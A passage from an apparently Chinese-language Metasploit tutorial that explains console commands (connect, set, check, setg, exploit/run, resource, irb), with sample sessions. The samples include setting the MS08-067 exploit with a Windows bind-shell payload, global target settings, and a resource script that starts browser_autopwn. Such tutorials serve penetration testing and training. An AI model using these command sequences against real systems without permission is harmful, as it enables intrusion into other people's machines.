conect 命令
connect命令可以连接到远程主机,连接方式和nc、telnet相同,可以指定端口,如下为connect命令演示:
msf > connect 127.0.0.1 4000 [*] Connected to 127.0.0.1:4000 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. E:\技术工具\cmd>msf > |
set命令
set命令用于当前使用模块的选项和设置参数。
set payload
set encoder xxx/xxx 设置利用程序编码方式
set target xxx 设置目标类型
set xxx xxx 设置参数
下面以ms08-067为例:
msf > use windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options RHOST => 192.168.10.10 msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp payload => windows/shell/bind_tcp msf exploit(ms08_067_netapi) > show options |
check命令
msf exploit(ms04_045_wins) > check [-] Check failed: The connection was refused by the remote host (192.168.1.114:42) |
设置全局变量
Metasploit 支持设置全局变量并可以进行存储,下次登录时直接使用。设置全局变量使用setg命令,unsetg撤销全局变量,save用于保存全局变量。如下所示:
msf > setg LHOST 192.168.1.101 LHOST => 192.168.1.101 msf > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24 msf > setg RHOST 192.168.1.136 RHOST => 192.168.1.136 msf > save Saved configuration to: /root/.msf3/config |
exploit/run命令
设置好各个参数后,可以使用exploit命令执行溢出操作,当使用了自定义auxiliary参数时,需要用run命令执行操作。
msf auxiliary(ms09_001_write) > run |
resource命令
resource命令可以加载资源文件,并按顺序执行文件中的命令。
msf > resource karma.rc resource> load db_sqlite3 [-] [-] The functionality previously provided by this plugin has been [-] integrated into the core command set. Use the new 'db_driver' [-] command to use a database driver other than sqlite3 (which [-] is now the default). All of the old commands are the same. [-] [-] Failed to load plugin from /pentest/exploits/framework3/plugins/db_sqlite3: Deprecated plugin resource> db_create /root/karma.db [*] The specified database already exists, connecting [*] Successfully connected to the database [*] File: /root/karma.db resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 10.0.0.1 AUTOPWN_HOST => 10.0.0.1 |
irb命令
运行irb命令,进入irb脚本模式,可以执行命令创建脚本。
msf > irb [*] Starting IRB shell... >> puts "BlackAngle!" BlackAngle! |